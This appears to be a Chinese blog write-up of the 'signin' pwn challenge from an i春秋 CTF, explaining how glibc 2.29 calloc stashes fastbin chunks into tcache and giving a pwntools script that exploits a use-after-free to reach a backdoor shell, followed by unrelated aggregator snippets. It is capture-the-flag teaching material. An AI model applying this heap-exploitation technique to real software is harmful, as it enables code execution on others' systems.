haivk
haivk

i春秋新春战役PWN之signin(calloc不从tcache里取chunk)

Signin(calloc不从tcache里取chunk)

首先,检查一下程序的保护机制

 

i春秋新春战役PWN之signin(calloc不从tcache里取chunk)_第1张图片

然后,我们用IDA分析一下,存在一个后门函数,要执行后面函数,需要ptr不为0

i春秋新春战役PWN之signin(calloc不从tcache里取chunk)_第2张图片

i春秋新春战役PWN之signin(calloc不从tcache里取chunk)_第3张图片

Delete功能没有清空指针

i春秋新春战役PWN之signin(calloc不从tcache里取chunk)_第4张图片

Edit功能存在UAF漏洞,但edit功能只能使用一次

i春秋新春战役PWN之signin(calloc不从tcache里取chunk)_第5张图片

测试出题目给我们的glibc版本为2.29,存在tcahce机制。

由于edit功能只用一次。同时,我们注意到后门里函数使用了calloc。

i春秋新春战役PWN之signin(calloc不从tcache里取chunk)_第6张图片

通过阅读glibc2.29源码,我们得知calloc不会从tcache bin里取空闲的chunk,而是从fastbin里取,取完后,和malloc一样,如果fastbin里还有剩余的chunk,则全部放到对应的tcache bin里取,采用头插法

  1.   if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ()))  
  2.     {  
  3.       idx = fastbin_index (nb);  
  4.       mfastbinptr *fb = &fastbin (av, idx);  
  5.       mchunkptr pp;  
  6.       victim = *fb;  
  7.   
  8.       if (victim != NULL)  
  9.     {  
  10.       if (SINGLE_THREAD_P)  
  11.         *fb = victim->fd;  
  12.       else  
  13.         REMOVE_FB (fb, pp, victim);  
  14.       if (__glibc_likely (victim != NULL))  
  15.         {  
  16.           size_t victim_idx = fastbin_index (chunksize (victim));  
  17.           if (__builtin_expect (victim_idx != idx, 0))  
  18.               malloc_printerr ("malloc(): memory corruption (fast)");  
  19.           check_remalloced_chunk (av, victim, nb);  
  20. #if USE_TCACHE  
  21.           /* While we're here, if we see other chunks of the same size, 
  22.          stash them in the tcache.  */  
  23.           size_t tc_idx = csize2tidx (nb);  
  24.           if (tcache && tc_idx < mp_.tcache_bins)  
  25.         {  
  26.           mchunkptr tc_victim;  
  27.   
  28.           /* While bin not empty and tcache not full, copy chunks.  */  
  29.           while (tcache->counts[tc_idx] < mp_.tcache_count  
  30.             && (tc_victim = *fb) != NULL)  
  31.             {  
  32.               if (SINGLE_THREAD_P)  
  33.                *fb = tc_victim->fd;  
  34.               else  
  35.               {  
  36.                 REMOVE_FB (fb, pp, tc_victim);  
  37.                 if (__glibc_unlikely (tc_victim == NULL))  
  38.                   break;  
  39.               }  
  40.               tcache_put (tc_victim, tc_idx);  
  41.             }  
  42.         }  
  43. #endif  
  44.           void *p = chunk2mem (victim);  
  45.           alloc_perturb (p, bytes);  
  46.           return p;  
  47.         }  
  48.     }  
  49.     }  

那么,我们可以利用一次edit,把ptr-0x10链接到fastbin里去,然后调用后面函数执行calloc从fastbin里取出一个chunk,然后剩余的chunk全部放到对应的tcache bin里去。由于采用的是头插法插入,那么(ptr-0x10)->fd = heap_x_addr,这样,也就是ptr被写了一个堆的地址,不为0了,那么接下来就会执行system(“/bin/sh”)了。

综上,我们的exp脚本

#coding:utf8
from pwn import *

sh = process('./signin')
ptr = 0x4040C0

def create(index):
   sh.sendlineafter('your choice?','1')
   sh.sendlineafter('idx?',str(index))

def edit(index,content):
   sh.sendlineafter('your choice?','2')
   sh.sendlineafter('idx?',str(index).ljust(0xE,'\x00'))
   sh.send(content)

def delete(index):
   sh.sendlineafter('your choice?','3')
   sh.sendlineafter('idx?',str(index))
#申请8个堆
for i in range(8):
   create(i)

#释放8个堆,7个进tcache,1个进fastbin
for i in range(8):
   delete(i)
#从tcache里取出一个,则还剩下6个
create(8)
edit(7,p64(ptr - 0x10))
#getshell
sh.sendlineafter('your choice?','6')

sh.interactive()

 

你可能感兴趣的:(pwn,CTF,二进制漏洞)

  • 前端手写题(二)
    目录一、new二、call三、apply四、bind五、create一、newnew的核心作用:基于构造函数创建实例,绑定原型链,初始化对象属性。底层四步:创建空对象→绑定原型→执行构造函数→处理返回值functionobjectFactory(constructor,...args){ //严格校验构造函数 if(typeofconstructor!=='function'){  throwne
  • springcloud feign调用get请求变成了post请求解决 只想要搞钱 springcloudjavaspring
    1.feign调用get请求,feignService定义的get请求的参数是一个对象,如下图,调用另一个服务时,提示405,变成了post请求@GetMapping("/trainContact/queryContactForCurrentUser")Result>queryContactForCurrentUser(TrainContactPageDTOpageDTO);2.解决,对象前加一个
  • Feign服务调用,Get、Post请求
    目录GET请求POST请求GET请求Feign客户端@FeignClient("lik-dr-product")publicinterfaceProductFeign{/***从请求路径获取值,需要使用@PathVariable注解*/@GetMapping("/product/findById/{id}")ProductfindById(@PathVariable("id")Longid);/*
  • 设计模式整理
    分类模式名称简要说明创建型Singleton(单例)保证一个类只有一个实例,并提供全局访问点创建型FactoryMethod(工厂方法)定义创建对象的接口,由子类决定实例化哪一个类创建型AbstractFactory(抽象工厂)提供一组相关或相互依赖对象的接口创建型Builder(建造者)分步骤创建复杂对象,将构建与表示分离创建型Prototype(原型)通过复制已有实例创建新对象结构型Adapt
  • Jenkins-Email Extension 插件插件 会又不会 自动化测试jenkins运维
    EditableEmailNotificationEditableEmailNotification是Jenkins的EmailExtension插件的核心功能,用于自定义邮件通知,包括邮件主题、内容、收件人、发件人等属性1.ProjectFrom项目发件人,设置邮件的发件人地址**注意:**需与Jenkins系统设置中的SMTP服务器配置一致(如发件人需有权限通过该SMTP发送邮件)2.Proj
  • MySQL函数分类(收藏) 两圆相切 mysql数据库
    1.数值处理函数用于数学运算和数值处理包括基本的算术运算、舍入、随机数生成等函数名功能语法示例结果示例版本适用备注ABS()返回数值的绝对值SELECTABS(-5);5所有版本CEIL()/CEILING()返回大于或等于数值的最小整数SELECTCEIL(3.2);4所有版本两个函数功能相同FLOOR()返回小于或等于数值的最大整数SELECTFLOOR(3.8);3所有版本ROUND()对数
  • CTF-bugku-[where is flag 4]-base64和zip压缩包 沧海一粟日尽其用 安全python
    step1:base64解码为16进制数据Base64解码Base64编码UTF8GB2312UTF16GBK二进制十六进制解密-TheX在线工具支持常见的utf8/gbk/utf16/gb2312编码。本工具可以自动探测识别一些常用的数据,并对他进行优化输出。如自动格式化xml和json数据、检测出图片的尺寸并可另存到文件。https://the-x.cn/base64/16进制的数据5D034
  • Android 多渠道配置
    Android多包名,icon本篇文章主要记录下android下的同一工程,打包时配置不同的包名,icon,名称等信息.1:多包名首先讲述下如何配置多包名.在build.gralde的android标签下添加:productFlavors{xiaomi{applicationId“com.test.usagetest”}huawei{applicationId“com.test.usagetest
  • CTF Web的数组巧用 还鮟 android
    PHP数组绕过intval和preg_match的CTF技巧原题目
  • pwn手记录题3
    前言:研究生的生活很充实(忙,大概三年我再也没有时间去认真做题了以下是最近比赛的遇到的题目。仅记录脚本,细节不会再核实了(没时间(;´༎ຶД༎ຶ`))可能以后不太会触碰CTF比赛了强网杯-baby_heapfrompwnimport*context(os='linux',arch='amd64',log_level='debug')binary='./pwn'r=process(binary)el
  • 第 3 周:Fiber 架构原理(调和流程) longhuxiu 架构
    目标:理解beginWork、completeWork的作用搞懂调和的核心流程推荐文件:ReactFiberBeginWork.jsReactFiberCompleteWork.jsReactChildFiber.js理解beginWork、completeWork的作用在React源码中,beginWork和completeWork是调和(reconciliation)阶段的核心函数,它们构成了
  • 设计模式:工厂模式 (简单工厂、工厂方法、抽象工厂) 案例详解 码农小灰 面试题java设计模式设计模式
    目录一、引言:为什么需要工厂模式?二、简单工厂模式(SimpleFactory)1.核心思想2.代码示例3.优点与缺点4.适用场景三、工厂方法模式(FactoryMethod)1.核心思想2.代码示例3.优点与缺点4.适用场景四、抽象工厂模式(AbstractFactory)1.核心思想2.代码示例3.优点与缺点4.适用场景五、对比与选择建议六、进阶技巧与注意事项七、总结一、引言:为什么需要工厂模
  • CTF-NetA:CTF网络流量分析的得力助手 叶彩曼Darcy
    CTF-NetA:CTF网络流量分析的得力助手CTF-NetA项目地址:https://gitcode.com/gh_mirrors/ct/CTF-NetA在网络安全领域,CTF(CaptureTheFlag)比赛是检验和提升技术能力的重要途径。然而,面对复杂的网络流量分析任务,许多参赛者往往感到力不从心。今天,我要向大家推荐一款专为CTF比赛设计的网络流量分析工具——CTF-NetA,它将助你一
  • 史上最全的CTF保姆教程 从入门到入狱【带工具】 最爱吃南瓜 网络安全web安全windows
    下面分享的资源包含国内9套教程教程1-CTF从入门到提升四周学习视频教程教程2-信息安全CTF比赛培训教程教程3-CTF从入门到提升教程4-CTF培训web网络安全基础入门渗透测试教程教程5-CTF入门课程教程6-CTF夺旗全套视频教程教程7-网络安全课程新手入门必看教程8-bugku_CTF_Web视频教程网络安全预科班课程CTF入门国外3套教程国外教程1套-GoogleCTF2018Begin
  • 拓展nRF Connect SDK 的组件 Halfway-- Product嵌入式硬件物联网arm开发单片机
    1:nRFConnectSDKAdd-ons是一组扩展nRFConnectSDK功能的补充组件。这些add-ons包括应用程序、驱动程序、库和协议实现。可以通过nRFConnectSDKAdd-ons索引浏览和进行访问https://nrfconnect.github.io/ncs-app-index/2:如何在本地环境中构建和运行nRFConnectSDK插件索引,可以使用nRFConnectf
  • Java设计模式之抽象工厂模式(Abstract Factory)笔记 ikwil 设计模式专栏java设计模式抽象工厂模式
    目录什么叫做抽象工厂模式抽象工厂模式作用抽象工厂模式特征对比抽象工厂和工厂方法抽象工厂模应用场景抽象工厂模式的实现定义抽象工厂接口实现具体产品类定义抽象工厂接口实现具体工厂类进行测试总结参考文献什么叫做抽象工厂模式抽象工厂模式(AbstractFactoryPattern)是一种创建型设计模式,用于提供一个接口,使得客户端能够创建一系列相关或依赖的对象,而无需指定它们的具体类。这个模式有助于确保一
  • 设计模式 (四)
    抽象工厂模式(AbstractFactoryPattern)详解一、核心概念抽象工厂模式是一种创建型设计模式,其核心思想是提供一个创建一系列相关或相互依赖对象的接口,而无需指定它们具体的类。它允许客户端通过抽象接口创建一组产品,而不必关心具体实现类。二、核心角色抽象工厂(AbstractFactory):定义创建一组产品的抽象方法(如createProductA()、createProductB(
  • React Error Boundary Happy_Ariel react.jsjavascript前端
    ReactErrorBoundaryimport*asReactfrom'react';import{Component}from'react';import{createRoot}from'react-dom/client';functionrenderWithError(){thrownewError('error');}functionA(){return{renderWithError()
  • buuctf-misc-二维码1 mlws1900 ctfbuuctfmiscservletjarjava
    显而易见的二维码题目,解压得到一个二维码解码获取内容secretishere我以为到这就结束了,flag{}加上就ok,结果发现失败用winhex打开看一下发现里面存在一个4numbers.txt用软件分离出来发现要密码,写着4numbers,应该就是纯数字密码爆破利用工具进行压缩包密码爆破密码为7639解压获得flagCTF{vjpw_wnoei}提交时候要改成flag{vjpw_wnoei}
  • buuctf新生赛(ACTF2020) HfLllo linux运维服务器
    1.Upload:文件上传,phtml2.BackupFile:codesearch找备份文件,弱类型比较==(只要求值相等)3.Exec:网站;ls(linux列出当前目录有哪些文件和目录)网站;ls/(看根目录里有什么内容)查看文件:web;cat/file4.Include:php://filter/read=convert.base64-encode/resource=file.php,再
  • [ACTF2020 新生赛]Include1详细解题思路 櫻九.923 安全
    1.点击查看出现了这个2.F12查看源代码3.没有发现没有有用信息时返回上一级查看源代码(要细心查看每一个界面的源代码,去寻找漏洞,顺势找到flag4.发现包含了一个PHP文件,那我们接下来就需要了解相应的知识了PHP伪协议(PHP定义的一种特殊访问资源的方法)⭐️PHP伪协议详解-CSDN博客1.伪协议成功执行需要一些条件在满足条件的情况下根据相应的类型,所对应的方法进行查看2.5.输入相应的编
  • Promise实例简单使用与理解 lichenyang453 前端
    Promise的案例我们直接上案例然后通过案例去解释理解。我们的代码模拟的是去前端访问服务器获取数据然后渲染到页面上,服务器模拟的也是去访问其他地址获取数据然后返还给前端。importReactfrom'react'importHeaderfrom'./components/Header'import{useEffect,useState}from'react'import{useRoutes}f
  • 工厂模式深度解析:工厂方法 vs 抽象工厂 hixiaoyang 设计模式
    1.核心概念对比1.1工厂方法模式(FactoryMethod)工厂方法模式定义一个创建对象的接口,但让子类决定实例化哪一个类。工厂方法使一个类的实例化延迟到其子类。关键结论:工厂方法是"单个产品等级结构"的创建解决方案,通过子类化实现具体创建逻辑1.2抽象工厂模式(AbstractFactory)抽象工厂模式提供一个创建一系列相关或相互依赖对象的接口,而无需指定它们具体的类。关键结论:抽象工厂是
  • AI开发tool提示词 开水好喝 测试工具java服务器前端人工智能
    Playwright处理module元素及其子节点[TASK]生成一个isModuleElementObjectfunction,若element的qa-testclass在对象moduleObj{"qa-test-mycourses-course":"qa-test-mycourses-course-title","qa-test-discussion-module":"qa-test-disc
  • 零起步的 FPGA 学习圣经:Project F 开源项目深度解读 OpenFPGA fpga开发学习
    在FPGA学习过程中,你是否也曾遇到过这些问题:教材晦涩难懂,电路图和代码脱节?找不到既系统又实战的开源学习资料?工具链配置复杂,不知从何下手?如果你点头了,那么今天推荐的开源项目ProjectF,可能就是你期待已久的答案。什么是ProjectF?ProjectF是一个完全开源的、面向学习者的FPGA教程项目,由英国开发者WillGreen维护,旨在帮助开发者从零开始学习数字逻辑和硬件设计。项目口
  • BUUCTF[极客大挑战 2019]Knife 我要当web糕手 phpweb
    1.题目分析1.启动靶机,查看网页中间一句话木马,帮助我们获得webshell,以POST形式接受变量SycPHP一句话木马通常是一个非常短小的PHP代码片段,通过一行代码实现对受攻击系统的控制。这种木马通常以加密或编码的形式出现,以避免被检测到。一句话木马的特点是使用简洁的语法和功能强大的命令执行功能,可以通过与恶意控制端进行通信,执行各种操作,例如上传/下载文件、执行系统命令、创建用户、修改文
  • 【QT】QPointF、QRectF、QPolygonF 介绍 我不是程序猿儿 QT之路qt开发语言
    QPointF确实存在于Qt框架中,它是一个类,用于表示二维空间中的一个点,其中包含了浮点精度的x和y坐标。主要特点和用途高精度坐标:QPointF使用double类型来存储x和y坐标,这提供了比QPoint(后者存储整数坐标)更高的精度。这在需要精确定位或处理图形和界面元素时特别有用,例如在绘图、图像处理或任何需要几何计算的应用中。数学运算支持:QPointF提供了一系列便利的数学运算,如加法、
  • 【防攻世界】misc解题思路-学习笔记 CarrotNot MIsc解题练习学习安全
    前言靶场地址:防攻世界一、Catfalg丢进kali或者其他Linux系统直接catflag二、MeowMeow可爱的小猫这道题就很离谱,flag需要用010工具打开,拉到最后就可以看到文字样式组起来就是:CatCTF{CAT_GOES_MEOW}
  • 2021-09-28 网安实验-杂项-SCTF-Misc400A 愚公搬代码 愚公系列-网络安全实验测试工具windows
    相关知识WireSharkWireshark是一个网络数据包分析软件,即通常所说的抓包软件。Wireshark可以抓取通过制定网卡的所有网络数据包,并根据数据包的格式尽可能显示出最为详细的信息,其支持各种主流的网络通信协议。Wireshark使用WinPCAP作为接口,直接与网卡进行数据交换。Wireshark提供了显示过滤控制,使用tcpcontains".rar"过滤器可以过滤含有.rar字符
  • WinUI3入门9:自制SplitPanel 初级代码游戏 WinUIWinUIC#SplitPanel拉伸
    初级代码游戏的专栏介绍与文章目录-CSDN博客我的github:codetoys,所有代码都将会位于ctfc库中。已经放入库中我会指出在库中的位置。这些代码大部分以Linux为目标但部分代码是纯C++的,可以在任何平台上使用。源码指引:github源码指引_初级代码游戏的博客-CSDN博客C#是我多年以来的业余爱好,新搞的东西能用C#的就用C#了。WinUI3里面有个SplitView,实现了两块
  • tomcat基础与部署发布 暗黑小菠萝 Tomcat java web
    从51cto搬家了,以后会更新在这里方便自己查看。 做项目一直用tomcat,都是配置到eclipse中使用,这几天有时间整理一下使用心得,有一些自己配置遇到的细节问题。 Tomcat:一个Servlets和JSP页面的容器,以提供网站服务。 一、Tomcat安装     安装方式:①运行.exe安装包      &n
  • 网站架构发展的过程 ayaoxinchao 数据库应用服务器网站架构
    1.初始阶段网站架构:应用程序、数据库、文件等资源在同一个服务器上 2.应用服务和数据服务分离:应用服务器、数据库服务器、文件服务器 3.使用缓存改善网站性能:为应用服务器提供本地缓存,但受限于应用服务器的内存容量,可以使用专门的缓存服务器,提供分布式缓存服务器架构 4.使用应用服务器集群改善网站的并发处理能力:使用负载均衡调度服务器,将来自客户端浏览器的访问请求分发到应用服务器集群中的任何
  • [信息与安全]数据库的备份问题 comsci 数据库
          如果你们建设的信息系统是采用中心-分支的模式,那么这里有一个问题   如果你的数据来自中心数据库,那么中心数据库如果出现故障,你的分支机构的数据如何保证安全呢?    是否应该在这种信息系统结构的基础上进行改造,容许分支机构的信息系统也备份一个中心数据库的文件呢?  &n
  • 使用maven tomcat plugin插件debug关联源代码 商人shang mavendebug查看源码tomcat-plugin
    *首先需要配置好'''maven-tomcat7-plugin''',参见[[Maven开发Web项目]]的'''Tomcat'''部分。 *配置好后,在[[Eclipse]]中打开'''Debug Configurations'''界面,在'''Maven Build'''项下新建当前工程的调试。在'''Main'''选项卡中点击'''Browse Workspace...'''选择需要开发的
  • 大访问量高并发 oloz 大访问量高并发
    大访问量高并发的网站主要压力还是在于数据库的操作上,尽量避免频繁的请求数据库。下面简 要列出几点解决方案: 01、优化你的代码和查询语句,合理使用索引 02、使用缓存技术例如memcache、ecache将不经常变化的数据放入缓存之中 03、采用服务器集群、负载均衡分担大访问量高并发压力 04、数据读写分离 05、合理选用框架,合理架构(推荐分布式架构)。
  • cache 服务器 小猪猪08 cache
    Cache   即高速缓存.那么cache是怎么样提高系统性能与运行速度呢?是不是在任何情况下用cache都能提高性能?是不是cache用的越多就越好呢?我在近期开发的项目中有所体会,写下来当作总结也希望能跟大家一起探讨探讨,有错误的地方希望大家批评指正。   1.Cache   是怎么样工作的?   Cache   是分配在服务器上
  • mysql存储过程 香水浓 mysql
    Description:插入大量测试数据 use xmpl; drop procedure if exists mockup_test_data_sp; create procedure mockup_test_data_sp( in number_of_records int ) begin declare cnt int; declare name varch
  • CSS的class、id、css文件名的常用命名规则 agevs JavaScriptUI框架Ajaxcss
      CSS的class、id、css文件名的常用命名规则     (一)常用的CSS命名规则   头:header   内容:content/container   尾:footer   导航:nav   侧栏:sidebar   栏目:column   页面外围控制整体布局宽度:wrapper   左右中:left right
  • 全局数据源 AILIKES javatomcatmysqljdbcJNDI
    实验目的:为了研究两个项目同时访问一个全局数据源的时候是创建了一个数据源对象,还是创建了两个数据源对象。 1:将diuid和mysql驱动包(druid-1.0.2.jar和mysql-connector-java-5.1.15.jar)copy至%TOMCAT_HOME%/lib下;2:配置数据源,将JNDI在%TOMCAT_HOME%/conf/context.xml中配置好,格式如下:&l
  • MYSQL的随机查询的实现方法 baalwolf mysql
    MYSQL的随机抽取实现方法。举个例子,要从tablename表中随机提取一条记录,大家一般的写法就是:SELECT * FROM tablename ORDER BY RAND() LIMIT 1。但是,后来我查了一下MYSQL的官方手册,里面针对RAND()的提示大概意思就是,在ORDER BY从句里面不能使用RAND()函数,因为这样会导致数据列被多次扫描。但是在MYSQL 3.23版本中,
  • JAVA的getBytes()方法 bijian1013 javaeclipseunixOS
        在Java中,String的getBytes()方法是得到一个操作系统默认的编码格式的字节数组。这个表示在不同OS下,返回的东西不一样!      String.getBytes(String decode)方法会根据指定的decode编码返回某字符串在该编码下的byte数组表示,如: byte[] b_gbk = "
  • AngularJS中操作Cookies bijian1013 JavaScriptAngularJSCookies
            如果你的应用足够大、足够复杂,那么你很快就会遇到这样一咱种情况:你需要在客户端存储一些状态信息,这些状态信息是跨session(会话)的。你可能还记得利用document.cookie接口直接操作纯文本cookie的痛苦经历。         幸运的是,这种方式已经一去不复返了,在所有现代浏览器中几乎
  • [Maven学习笔记五]Maven聚合和继承特性 bit1129 maven
    Maven聚合   在实际的项目中,一个项目通常会划分为多个模块,为了说明问题,以用户登陆这个小web应用为例。通常一个web应用分为三个模块: 1. 模型和数据持久化层user-core, 2. 业务逻辑层user-service以 3. web展现层user-web, user-service依赖于user-core user-web依赖于user-core和use
  • 【JVM七】JVM知识点总结 bit1129 jvm
      1. JVM运行模式 1.1 JVM运行时分为-server和-client两种模式,在32位机器上只有client模式的JVM。通常,64位的JVM默认都是使用server模式,因为server模式的JVM虽然启动慢点,但是,在运行过程,JVM会尽可能的进行优化 1.2 JVM分为三种字节码解释执行方式:mixed mode, interpret mode以及compiler
  • linux下查看nginx、apache、mysql、php的编译参数 ronin47
    在linux平台下的应用,最流行的莫过于nginx、apache、mysql、php几个。而这几个常用的应用,在手工编译完以后,在其他一些情况下(如:新增模块),往往想要查看当初都使用了那些参数进行的编译。这时候就可以利用以下方法查看。 1、nginx [root@361way ~]# /App/nginx/sbin/nginx -V nginx: nginx version: nginx/
  • unity中运用Resources.Load的方法? brotherlamp unity视频unity资料unity自学unityunity教程
    问:unity中运用Resources.Load的方法? 答:Resources.Load是unity本地动态加载资本所用的方法,也即是你想动态加载的时分才用到它,比方枪弹,特效,某些实时替换的图像什么的,主张此文件夹不要放太多东西,在打包的时分,它会独自把里边的一切东西都会集打包到一同,不论里边有没有你用的东西,所以大多数资本应该是自个建文件放置 1、unity实时替换的物体即是依据环境条件
  • 线段树-入门 bylijinnan java算法线段树
    /** * 线段树入门 * 问题:已知线段[2,5] [4,6] [0,7];求点2,4,7分别出现了多少次 * 以下代码建立的线段树用链表来保存,且树的叶子结点类似[i,i] * * 参考链接:http://hi.baidu.com/semluhiigubbqvq/item/be736a33a8864789f4e4ad18 * @author lijinna
  • 全选与反选 chicony 全选
      <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>全选与反选</title>
  • vim一些简单记录 chenchao051 vim
    mac在/usr/share/vim/vimrc linux在/etc/vimrc   1、问:后退键不能删除数据,不能往后退怎么办?       答:在vimrc中加入set backspace=2   2、问:如何控制tab键的缩进?       答:在vimrc中加入set tabstop=4 (任何
  • Sublime Text 快捷键 daizj 快捷键sublime
    [size=large][/size]Sublime Text快捷键:Ctrl+Shift+P:打开命令面板Ctrl+P:搜索项目中的文件Ctrl+G:跳转到第几行Ctrl+W:关闭当前打开文件Ctrl+Shift+W:关闭所有打开文件Ctrl+Shift+V:粘贴并格式化Ctrl+D:选择单词,重复可增加选择下一个相同的单词Ctrl+L:选择行,重复可依次增加选择下一行Ctrl+Shift+L:
  • php 引用(&)详解 dcj3sjt126com PHP
    在PHP 中引用的意思是:不同的名字访问同一个变量内容. 与C语言中的指针是有差别的.C语言中的指针里面存储的是变量的内容在内存中存放的地址 变量的引用 PHP 的引用允许你用两个变量来指向同一个内容  复制代码代码如下: <?  $a="ABC";  $b =&$a;  echo
  • SVN中trunk,branches,tags用法详解 dcj3sjt126com SVN
    Subversion有一个很标准的目录结构,是这样的。比如项目是proj,svn地址为svn://proj/,那么标准的svn布局是svn://proj/|+-trunk+-branches+-tags这是一个标准的布局,trunk为主开发目录,branches为分支开发目录,tags为tag存档目录(不允许修改)。但是具体这几个目录应该如何使用,svn并没有明确的规范,更多的还是用户自己的习惯。
  • 对软件设计的思考 e200702084 设计模式数据结构算法ssh活动
    软件设计的宏观与微观    软件开发是一种高智商的开发活动。一个优秀的软件设计人员不仅要从宏观上把握软件之间的开发,也要从微观上把握软件之间的开发。宏观上,可以应用面向对象设计,采用流行的SSH架构,采用web层,业务逻辑层,持久层分层架构。采用设计模式提供系统的健壮性和可维护性。微观上,对于一个类,甚至方法的调用,从计算机的角度模拟程序的运行情况。了解内存分配,参数传
  • 同步、异步、阻塞、非阻塞 geeksun 非阻塞
    同步、异步、阻塞、非阻塞这几个概念有时有点混淆,在此文试图解释一下。   同步:发出方法调用后,当没有返回结果,当前线程会一直在等待(阻塞)状态。 场景:打电话,营业厅窗口办业务、B/S架构的http请求-响应模式。   异步:方法调用后不立即返回结果,调用结果通过状态、通知或回调通知方法调用者或接收者。异步方法调用后,当前线程不会阻塞,会继续执行其他任务。 实现:
  • Reverse SSH Tunnel 反向打洞實錄 hongtoushizi ssh
    實際的操作步驟: # 首先,在客戶那理的機器下指令連回我們自己的 Server,並設定自己 Server 上的 12345 port 會對應到幾器上的 SSH port ssh -NfR 12345:localhost:22 [email protected] # 然後在 myhost 的機器上連自己的 12345 port,就可以連回在客戶那的機器 ssh localhost -p 1
  • Hibernate中的缓存 Josh_Persistence 一级缓存Hiberante缓存查询缓存二级缓存
    Hibernate中的缓存   一、Hiberante中常见的三大缓存:一级缓存,二级缓存和查询缓存。 Hibernate中提供了两级Cache,第一级别的缓存是Session级别的缓存,它是属于事务范围的缓存。这一级别的缓存是由hibernate管理的,一般情况下无需进行干预;第二级别的缓存是SessionFactory级别的缓存,它是属于进程范围或群集范围的缓存。这一级别的缓存
  • 对象关系行为模式之延迟加载 home198979 PHP架构延迟加载
    形象化设计模式实战     HELLO!架构   一、概念 Lazy Load:一个对象,它虽然不包含所需要的所有数据,但是知道怎么获取这些数据。 延迟加载貌似很简单,就是在数据需要时再从数据库获取,减少数据库的消耗。但这其中还是有不少技巧的。     二、实现延迟加载 实现Lazy Load主要有四种方法:延迟初始化、虚
  • xml 验证 pengfeicao521 xmlxml解析
    有些字符,xml不能识别,用jdom或者dom4j解析的时候就报错 public static void testPattern() { // 含有非法字符的串 String str =       "Jamey&#52828;&#01;&#02;&#209;&#1282
  • div设置半透明效果 spjich css半透明
    为div设置如下样式:   div{filter:alpha(Opacity=80);-moz-opacity:0.5;opacity: 0.5;}        说明: 1、filter:对win IE设置半透明滤镜效果,filter:alpha(Opacity=80)代表该对象80%半透明,火狐浏览器不认2、-moz-opaci
  • 你真的了解单例模式么? w574240966 java单例设计模式jvm
        单例模式,很多初学者认为单例模式很简单,并且认为自己已经掌握了这种设计模式。但事实上,你真的了解单例模式了么。   一,单例模式的5中写法。(回字的四种写法,哈哈。)     1,懒汉式           (1)线程不安全的懒汉式 public cla
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他